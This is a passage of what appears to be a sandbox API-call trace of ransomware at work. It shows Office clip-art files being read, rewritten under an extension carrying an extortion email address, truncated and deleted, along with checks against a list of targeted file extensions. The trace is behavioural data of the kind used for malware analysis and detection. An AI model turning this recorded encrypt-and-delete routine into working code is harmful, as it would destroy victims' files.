lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.944] WriteFile (in: hFile=0x388, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.944] SetEndOfFile (hFile=0x388) returned 1 [0272.944] CloseHandle (hObject=0x388) returned 1 [0272.944] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.944] SetEndOfFile (hFile=0x3a8) returned 1 [0272.946] CloseHandle (hObject=0x3a8) returned 1 [0272.946] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.946] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00612_.wmf")) returned 1 [0272.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF") returned 63 [0272.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF") returned 63 [0272.947] lstrlenW (lpString=".doc") returned 4 [0272.947] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.947] lstrlenW (lpString=".docx") returned 5 [0272.947] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.947] lstrlenW (lpString=".pdf") returned 4 [0272.947] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.947] lstrlenW (lpString=".xls") returned 4 [0272.947] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.947] lstrlenW (lpString=".xlsx") returned 5 [0272.947] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.947] lstrlenW (lpString=".ppt") returned 4 [0272.947] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF") returned 63 [0272.947] lstrlenW (lpString=".zip") returned 4 [0272.947] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.947] lstrlenW (lpString=".rar") returned 4 [0272.947] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.947] lstrlenW (lpString=".bz2") returned 4 [0272.947] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.947] lstrlenW (lpString=".7z") returned 3 [0272.947] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF") returned 63 [0272.947] lstrlenW (lpString=".dbf") returned 4 [0272.947] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF") returned 63 [0272.948] lstrlenW (lpString=".1cd") returned 4 [0272.948] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.948] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF") returned 63 [0272.948] lstrlenW (lpString=".jpg") returned 4 [0272.948] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.948] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF") returned 63 [0272.948] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF") returned 63 [0272.948] lstrlenW (lpString=".doc") returned 4 [0272.948] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.948] lstrlenW (lpString=".docx") returned 5 [0272.948] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.948] lstrlenW (lpString=".pdf") returned 4 [0272.948] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.948] lstrlenW (lpString=".xls") returned 4 [0272.948] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.948] lstrlenW (lpString=".xlsx") returned 5 [0272.948] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.948] lstrlenW (lpString=".ppt") returned 4 [0272.948] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.948] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF") returned 63 [0272.948] lstrlenW (lpString=".zip") returned 4 [0272.948] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.948] lstrlenW (lpString=".rar") returned 4 [0272.948] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.948] lstrlenW (lpString=".bz2") returned 4 [0272.948] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.948] lstrlenW (lpString=".7z") returned 3 [0272.948] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.948] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF") returned 63 [0272.948] lstrlenW (lpString=".dbf") returned 4 [0272.949] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.949] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF") returned 63 [0272.949] lstrlenW (lpString=".1cd") returned 4 [0272.949] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.949] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF") returned 63 [0272.949] lstrlenW (lpString=".jpg") returned 4 [0272.949] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.949] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0272.949] lstrlenW (lpString="HH00687_.WMF") returned 12 [0272.949] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00687_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0272.949] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=4340) returned 1 [0272.949] CloseHandle (hObject=0x3a8) returned 1 [0272.949] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00687_.wmf")) returned 0x20 [0272.949] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00687_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.950] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00687_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0272.950] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.950] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.950] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00687_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0272.950] GetLastError () returned 0x0 [0272.950] ReadFile (in: hFile=0x3a8, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x10f4, lpOverlapped=0x0) returned 1 [0272.974] WriteFile (in: hFile=0x388, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x1100, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x1100, lpOverlapped=0x0) returned 1 [0272.974] ReadFile (in: hFile=0x3a8, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.974] WriteFile (in: hFile=0x388, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.975] SetEndOfFile (hFile=0x388) returned 1 [0272.975] CloseHandle (hObject=0x388) returned 1 [0272.975] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.975] SetEndOfFile (hFile=0x3a8) returned 1 [0272.976] CloseHandle (hObject=0x3a8) returned 1 [0272.976] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.977] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00687_.wmf")) returned 1 [0272.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF") returned 63 [0272.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF") returned 63 [0272.977] lstrlenW (lpString=".doc") returned 4 [0272.977] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.977] lstrlenW (lpString=".docx") returned 5 [0272.977] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.977] lstrlenW (lpString=".pdf") returned 4 [0272.977] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.977] lstrlenW (lpString=".xls") returned 4 [0272.977] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.977] lstrlenW (lpString=".xlsx") returned 5 [0272.977] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.977] lstrlenW (lpString=".ppt") returned 4 [0272.977] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF") returned 63 [0272.977] lstrlenW (lpString=".zip") returned 4 [0272.977] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.977] lstrlenW (lpString=".rar") returned 4 [0272.977] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.977] lstrlenW (lpString=".bz2") returned 4 [0272.977] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.977] lstrlenW (lpString=".7z") returned 3 [0272.977] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF") returned 63 [0272.978] lstrlenW (lpString=".dbf") returned 4 [0272.978] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF") returned 63 [0272.978] lstrlenW (lpString=".1cd") returned 4 [0272.978] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF") returned 63 [0272.978] lstrlenW (lpString=".jpg") returned 4 [0272.978] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF") returned 63 [0272.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF") returned 63 [0272.978] lstrlenW (lpString=".doc") returned 4 [0272.978] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.978] lstrlenW (lpString=".docx") returned 5 [0272.978] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.978] lstrlenW (lpString=".pdf") returned 4 [0272.978] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.978] lstrlenW (lpString=".xls") returned 4 [0272.978] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.978] lstrlenW (lpString=".xlsx") returned 5 [0272.978] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.978] lstrlenW (lpString=".ppt") returned 4 [0272.978] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF") returned 63 [0272.978] lstrlenW (lpString=".zip") returned 4 [0272.978] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.978] lstrlenW (lpString=".rar") returned 4 [0272.978] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.978] lstrlenW (lpString=".bz2") returned 4 [0272.979] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.979] lstrlenW (lpString=".7z") returned 3 [0272.979] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF") returned 63 [0272.979] lstrlenW (lpString=".dbf") returned 4 [0272.979] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF") returned 63 [0272.979] lstrlenW (lpString=".1cd") returned 4 [0272.979] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF") returned 63 [0272.979] lstrlenW (lpString=".jpg") returned 4 [0272.979] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.979] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0272.979] lstrlenW (lpString="HH01015_.WMF") returned 12 [0272.979] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01015_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0273.009] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=1148) returned 1 [0273.009] CloseHandle (hObject=0x3a8) returned 1 [0273.009] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01015_.wmf")) returned 0x20 [0273.009] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01015_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.009] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01015_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0273.009] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.009] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.009] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01015_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0273.010] GetLastError () returned 0x0 [0273.010] ReadFile (in: hFile=0x3a8, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x47c, lpOverlapped=0x0) returned 1 [0273.020] WriteFile (in: hFile=0x388, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x480, lpOverlapped=0x0) returned 1 [0273.021] ReadFile (in: hFile=0x3a8, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.021] WriteFile (in: hFile=0x388, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.021] SetEndOfFile (hFile=0x388) returned 1 [0273.021] CloseHandle (hObject=0x388) returned 1 [0273.021] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.021] SetEndOfFile (hFile=0x3a8) returned 1 [0273.023] CloseHandle (hObject=0x3a8) returned 1 [0273.023] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.041] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01015_.wmf")) returned 1 [0273.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF") returned 63 [0273.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF") returned 63 [0273.041] lstrlenW (lpString=".doc") returned 4 [0273.041] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.041] lstrlenW (lpString=".docx") returned 5 [0273.041] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.041] lstrlenW (lpString=".pdf") returned 4 [0273.041] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.041] lstrlenW (lpString=".xls") returned 4 [0273.041] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.041] lstrlenW (lpString=".xlsx") returned 5 [0273.041] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.041] lstrlenW (lpString=".ppt") returned 4 [0273.041] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF") returned 63 [0273.041] lstrlenW (lpString=".zip") returned 4 [0273.041] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.042] lstrlenW (lpString=".rar") returned 4 [0273.042] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.042] lstrlenW (lpString=".bz2") returned 4 [0273.042] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.042] lstrlenW (lpString=".7z") returned 3 [0273.042] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF") returned 63 [0273.042] lstrlenW (lpString=".dbf") returned 4 [0273.042] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF") returned 63 [0273.042] lstrlenW (lpString=".1cd") returned 4 [0273.042] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF") returned 63 [0273.042] lstrlenW (lpString=".jpg") returned 4 [0273.042] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF") returned 63 [0273.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF") returned 63 [0273.042] lstrlenW (lpString=".doc") returned 4 [0273.042] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.042] lstrlenW (lpString=".docx") returned 5 [0273.042] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.042] lstrlenW (lpString=".pdf") returned 4 [0273.042] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.042] lstrlenW (lpString=".xls") returned 4 [0273.042] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.042] lstrlenW (lpString=".xlsx") returned 5 [0273.042] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.042] lstrlenW (lpString=".ppt") returned 4 [0273.043] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF") returned 63 [0273.043] lstrlenW (lpString=".zip") returned 4 [0273.043] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.043] lstrlenW (lpString=".rar") returned 4 [0273.043] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.043] lstrlenW (lpString=".bz2") returned 4 [0273.043] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.043] lstrlenW (lpString=".7z") returned 3 [0273.043] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF") returned 63 [0273.043] lstrlenW (lpString=".dbf") returned 4 [0273.043] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF") returned 63 [0273.043] lstrlenW (lpString=".1cd") returned 4 [0273.043] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF") returned 63 [0273.043] lstrlenW (lpString=".jpg") returned 4 [0273.043] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.043] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0273.043] lstrlenW (lpString="HH01461_.WMF") returned 12 [0273.043] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01461_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0273.044] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=5958) returned 1 [0273.045] CloseHandle (hObject=0x3a8) returned 1 [0273.045] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01461_.wmf")) returned 0x20 [0273.045] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01461_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.045] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01461_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0273.045] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.045] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.045] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01461_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0273.045] GetLastError () returned 0x0 [0273.045] ReadFile (in: hFile=0x3a8, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x1746, lpOverlapped=0x0) returned 1 [0273.048] WriteFile (in: hFile=0x388, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x1750, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x1750, lpOverlapped=0x0) returned 1 [0273.049] ReadFile (in: hFile=0x3a8, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.049] WriteFile (in: hFile=0x388, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.049] SetEndOfFile (hFile=0x388) returned 1 [0273.049] CloseHandle (hObject=0x388) returned 1 [0273.049] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, 